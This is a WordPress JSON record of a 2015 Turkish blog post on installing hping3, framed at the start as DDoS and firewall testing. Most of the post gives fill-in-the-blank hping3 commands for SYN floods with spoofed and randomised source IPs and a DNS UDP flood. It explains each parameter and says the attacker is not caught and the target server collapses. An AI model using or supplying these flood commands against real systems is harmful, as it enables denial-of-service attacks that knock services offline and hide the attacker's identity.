{"id":367,"date":"2015-07-16T01:51:16","date_gmt":"2015-07-15T22:51:16","guid":{"rendered":"https:\/\/furkansandal.com\/sitesunucu\/?p=367"},"modified":"2015-07-16T01:51:16","modified_gmt":"2015-07-15T22:51:16","slug":"linux-uzerine-hping3-kurmak-firewall-test-etmek","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/linux-uzerine-hping3-kurmak-firewall-test-etmek\/","title":{"rendered":"Linux \u00fczerine hping3 kurmak, firewall test etmek"},"content":{"rendered":"<p><a href=\"https:\/\/i0.wp.com\/furkansandal.com\/sitesunucu\/wp-content\/uploads\/2015\/07\/ddosprotection.jpg?ssl=1\"><img loading=\"lazy\" decoding=\"async\" class=\" size-full wp-image-371 aligncenter\" src=\"https:\/\/i0.wp.com\/furkansandal.com\/sitesunucu\/wp-content\/uploads\/2015\/07\/ddosprotection.jpg?resize=620%2C210&#038;ssl=1\" alt=\"ddosprotection\" width=\"620\" height=\"210\" data-recalc-dims=\"1\" \/><\/a><\/p>\n<h2>Linux hping3 \u00fczerinden Firewall testleri<\/h2>\n<p>DDoS testleri ger\u00e7ekle\u015ftirilirken genellikle test yap\u0131lan a\u011f\u0131n \u00e7\u0131k\u0131\u015f\u0131ndaki bir a\u011f\/g\u00fcvenlik cihaz\u0131 \u00fcretilen sahte ip paketlerini URPF&#8217;den (ya da benzeri bir \u00f6zellikten) dolay\u0131 engelliyor olabilir. Bu gibi durumlarda DDoS testlerinde \u00fcretilen paketler internete \u00e7\u0131kamayaca\u011f\u0131 i\u00e7in hedef sisteme etkisi olmayacakt\u0131r. Bu gibi ortamlarda g\u00f6nderilecek paketler kullan\u0131lan sistemle ayn\u0131 subnetten \u00fcretilirse (mesela DDoS testi icin kullan\u0131lan sistemin ip adresi 192.168.1.3\/24 olsun, burada 192.168.1.0\/24 subnetinden rastgele ip kullan\u0131labilir) URPF&#8217;e tak\u0131lmadan hedef sisteme eri\u015fecektir.<br \/>\nDDoS testlerinde yo\u011fun kullan\u0131lan Hping,\u00a0\u00a0network testleri icin kullanilan acik kaynak kodlu bir yazilimdir. Ozellikle &#8211;rand-source parametresi ile kaynak ip adreslerinin\u00a0de\u011fi\u015fken olmas\u0131 sa\u011flanabilmektedir.<\/p>\n<p>Ancak istenen ip adres blogundan kaynak paketlerin gonderilebilmesi hping ile on tan\u0131ml\u0131 olarak saglanamamaktadir. BGA ekibinden Omer Albayrak taraf\u0131ndan \u00a0geli\u015ftirilen yama ile bu ozellik &#8211;rand-pattern-source parametresi ile sa\u011flanabilmektedir. Ilgili yaman\u0131n uygulanmas\u0131 ve sonras\u0131nda kullan\u0131m\u0131na \u00a0dair ayr\u0131nt\u0131lar a\u015fa\u011f\u0131da anlat\u0131lmaktad\u0131r.<\/p>\n<p><strong>Kuruluma ge\u00e7elim (Centos)<\/strong><\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">yum install -y epel-release\r\n\r\nyum install -y hping3<\/pre>\n<p>&nbsp;<\/p>\n<p>komutuyla centos \u00fczerine hping3 kurulumunu ger\u00e7ekle\u015ftirdik. Debian ubuntu ve apt deposuyla \u00e7al\u0131\u015fanlar i\u00e7in,<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">apt-get install -y tcl8.4 tcl8.4-dev\r\n\r\napt-get install -y hping3<\/pre>\n<p>&nbsp;<\/p>\n<p>veya t\u00fcm sistemler i\u00e7in<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">mkdir \/usr\/local\/include\/net\r\nln -sf \/usr\/include\/pcap-bpf.h \/usr\/local\/include\/net\/bpf.h\r\nwget\u00a0&lt;a href=&quot;http:\/\/www.hping.org\/hping3-20051105.tar.gz&quot; target=&quot;_blank&quot;&gt;http:\/\/www.hping.org\/hping3-&lt;wbr \/&gt;20051105.tar.gz&lt;\/a&gt;\r\ntar -zxvf hping3-20051105.tar.gz\r\ncd hping3-20051105\/\r\npatch -p1 -i ..\/hping-rand-pattern.patch\r\n.\/configure; make; make install<\/pre>\n<p>&nbsp;<\/p>\n<p>komutuyla t\u00fcm linux s\u00fcr\u00fcmleri i\u00e7in hping3&#8217;\u00fc kurmu\u015f olduk. \u00d6rne\u011fin 127.0.0.1 ip adresinin tcp\/8080 portuna 5.5.5.x kaynak ip adres blogundan paket gondermek icin (yani 5.5.5.x olarak ip adresimizi g\u00f6sterip(fake hedef site kand\u0131rma amac\u0131) 127.0.0.1&#8217;e sald\u0131rma);<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">hping3 -c 3 -S -p 8080 127.0.0.1 --rand-pattern-source 5.5.5.x<\/pre>\n<p>&nbsp;<\/p>\n<p>Syn sald\u0131r\u0131lar\u0131na ge\u00e7elim \u015fu komut ile hedef-ip ve hedef-port olarak sald\u0131ral\u0131m;<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">hping3 -p hedef-port -S hedef-ip<\/pre>\n<p>&nbsp;<\/p>\n<p>\u0130p adresimizi gizleyip fake ipten sald\u0131rma komutu syn flood i\u00e7in,<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">hping3 -a fake-kullaniacak-ip -p hedef-port -S hedef-ip<\/pre>\n<p>&nbsp;<\/p>\n<p>Ba\u015flang\u0131c\u0131 fake ipten ba\u015flat\u0131p s\u00fcrekli fake ip olu\u015fturarak sald\u0131rmak i\u00e7in ise,<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">hping3 -p hedef-port -S hedef-ip --rand-source<\/pre>\n<p>&nbsp;<\/p>\n<p>Flood izinli sunucularda ise, sald\u0131r\u0131n\u0131n bel kemi\u011fi olan flood parametresi ile yerle bir edilmesi ka\u00e7\u0131n\u0131lmazd\u0131r \ud83d\ude42 Sizlere t\u00fcm parametreler tam doldurulmu\u015f syn halini g\u00f6stereyim. hedef-port ve hedef-ip b\u00f6lm\u00fcn\u00fc doldurman\u0131z yeterli olacakt\u0131r.<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">\r\n\r\nhping3 -c 10000 -d 120 -S -w 64 -p hedef-port --flood --rand-source hedef-ip<\/pre>\n<p>De\u011fi\u015fken isimlerine gelirsek,<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><code>hping3 <\/code>= Aplikasyon ad\u0131<\/li>\n<li><code>-c 100000<\/code> = G\u00f6nderilecek Paket Say\u0131s\u0131<\/li>\n<li><code>-d 120<\/code> = G\u00f6nderilecek Paket b\u00fcy\u00fckl\u00fc\u011f\u00fc<\/li>\n<li><code>-S<\/code> = Syn Flood Parametresi.<\/li>\n<li><code>-w 64<\/code> = TCP Pencere boyutu.<\/li>\n<li><code>-p 21<\/code> = Hedef Port.<\/li>\n<li><code>--flood<\/code> = Sald\u0131r\u0131n\u0131n bel kemi\u011fi bu olmazsa sald\u0131r\u0131 bir hi\u00e7 diyebiliriz. Fake ip \u00fcretip sald\u0131r\u0131r yakalanmaz.<\/li>\n<li><code>--rand-source<\/code> = Farkl\u0131 kaynaklardan IP \u00fcretir. Bu olmadan flood parametresi \u00e7al\u0131\u015fmaz.<\/li>\n<li><code>hedef-ip = Bu ise, ad\u0131ndan anla\u015f\u0131l\u0131yor :)<br \/>\n<\/code><\/li>\n<\/ul>\n<p>Ve sizlere DNS Flood&#8217;u da vererek yaz\u0131y\u0131 bitirmek istiyorum. Bizde s\u0131k\u0131l\u0131yoruz hani yazarken \ud83d\ude42 DNS UDP Floodtur. Buda kodummu otutturur. Sunucu \u00e7\u00f6ker k\u00f6kten. Sunucu \u00e7\u00f6kmese bile o alan ad\u0131na eri\u015fim olmaz.<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">hping3 --flood --rand-source --udp -p 53 dns_sunucu_ip_adresi -d 450<\/pre>\n<p style=\"text-align: center;\">De\u011fi\u015fkenleri art\u0131k anlam\u0131\u015fs\u0131n\u0131zd\u0131r diyerek, Yaz\u0131y\u0131 bitirmek istiyorum. Ba\u015fka bir yaz\u0131da g\u00f6r\u00fc\u015fmek \u00fczere&#8230;<\/p>\n<p style=\"text-align: center;\"><strong>Furkan Sandal<\/strong><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/i0.wp.com\/furkansandal.com\/sitesunucu\/wp-content\/uploads\/2014\/07\/hosting.jpg?ssl=1\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-174\" src=\"https:\/\/i0.wp.com\/furkansandal.com\/sitesunucu\/wp-content\/uploads\/2014\/07\/hosting.jpg?resize=529%2C339&#038;ssl=1\" alt=\"hosting\" width=\"529\" height=\"339\" data-recalc-dims=\"1\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linux hping3 \u00fczerinden Firewall testleri DDoS testleri ger\u00e7ekle\u015ftirilirken genellikle test yap\u0131lan a\u011f\u0131n \u00e7\u0131k\u0131\u015f\u0131ndaki bir a\u011f\/g\u00fcvenlik cihaz\u0131 \u00fcretilen sahte ip paketlerini&#8230;<\/p>\n","protected":false},"author":1,"featured_media":370,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/07\/ddos-2014-expert-insights-on-building-better-defense-landingPageImage-1-w-392.jpg?fit=400%2C400&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-5V","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/367"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=367"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/367\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/370"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}